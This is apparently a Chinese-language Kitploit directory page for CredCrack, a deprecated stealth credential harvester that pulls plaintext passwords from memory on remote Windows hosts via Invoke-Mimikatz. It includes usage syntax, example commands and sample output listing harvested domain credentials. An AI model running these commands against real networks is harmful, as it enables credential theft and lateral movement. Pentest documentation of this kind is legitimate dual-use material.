Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CredCrack — 快速且隐蔽的凭证收集器 | Kitploit
工具/GitHubGitHub/jobroche/credcrack
横向移动信息收集后渗透利用渗透测试
GitHubjobroche/credcrack

CredCrack

快速且隐蔽的凭证收集器

查看仓库
626107133年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CredCrack

⛔ [已弃用]。此仓库不再维护。请考虑使用 CrackMapExec。

简介


CredCrack 是一款快速且隐蔽的凭据收集工具。它能递归地从内存中以明文形式窃取凭据。任务完成后,CredCrack 会解析并输出凭据,同时识别所获取的域管理员账户。此外,CredCrack 还具备列出和枚举共享访问的能力,并且支持多线程!

CredCrack 已在 Kali Linux 原生工具环境下测试通过。它仅依赖于 PowerSploit 的 "Invoke-Mimikatz.ps1" 文件,需放在 /var/www 目录下。点击此处下载 Invoke-Mimikatz

帮助


usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - 一款隐蔽的凭据收集工具,作者 Jonathan Broche (@g0jhonny)

可选参数:
  -h, --help            显示此帮助信息并退出
  -f FILE, --file FILE  包含要收集凭据的 IP 的文件。每行一个 IP。
  -r RHOST, --rhost RHOST
                        远程主机 IP,用于收集凭据。
  -es, --enumshares     检查远程 IP 的共享访问权限
  -l LHOST, --lhost LHOST
                        本地主机 IP,用于发起扫描。
  -t THREADS, --threads THREADS
                        线程数(默认:10)

必需参数:
  -d DOMAIN, --domain DOMAIN
                        域或工作站
  -u USER, --user USER  域用户名

示例:

./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20

示例


枚举共享访问

./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
 ---------------------------------------------------------------------
  CredCrack v1.1 作者 Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] 验证 192.168.1.102
[*] 验证 192.168.1.103
[*] 验证 192.168.1.100

 -----------------------------------------------------------------
 192.168.1.102 - Windows 7 Professional 7601 Service Pack 1 
 -----------------------------------------------------------------
 
 开放      \\192.168.1.102\ADMIN$ 
 开放      \\192.168.1.102\C$ 

 -----------------------------------------------------------------
 192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2 
 -----------------------------------------------------------------
 
 开放      \\192.168.1.103\ADMIN$ 
 开放      \\192.168.1.103\C$ 
 关闭      \\192.168.1.103\F$ 

 -----------------------------------------------------------------
 192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
 -----------------------------------------------------------------
 
 关闭      \\192.168.1.100\ADMIN$ 
 关闭      \\192.168.1.100\C$ 
 开放      \\192.168.1.100\NETLOGON 
 开放      \\192.168.1.100\SYSVOL 

[*] 完成!耗时 0.8 秒

收集凭据


./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:

 ---------------------------------------------------------------------
  CredCrack v1.1 作者 Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] 搭建舞台
[*] 验证 192.168.1.102
[*] 验证 192.168.1.103
[*] 从 192.168.1.102 查询域管理员组
[*] 从 192.168.1.102 收集凭据
[*] 从 192.168.1.103 收集凭据

                  战利品已到手...
                         __________
                        /\____;;___\    
                       | /         /    
                       `. ())oo() .      
                        |\(%()*^^()^\       
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       

                
[*] 主机: 192.168.1.102 域: ACME 用户: jsmith 密码: Good0ljm1th
[*] 主机: 192.168.1.103 域: ACME 用户: daguy 密码: P@ssw0rd1!

     发现 1 个域管理员(已用黄色标出!)

[*] 清理中
[*] 完成!战利品可在 /root/CCloot 文件夹下找到
[*] 总耗时 11.3 秒

联系方式

如有任何问题或希望在下一个版本中看到的功能,请通过 @g0jhonny 与我联系。如发现 Bug,请提交 issue!

致谢

CredCrack 的诞生离不开以下各位的贡献。你们都是摇滚明星! @JosephBialek, @brav0hax, @altonjx 以及所有其他贡献者!感谢你们的贡献和反馈,让这个脚本变得更好,期待更多!

下载工具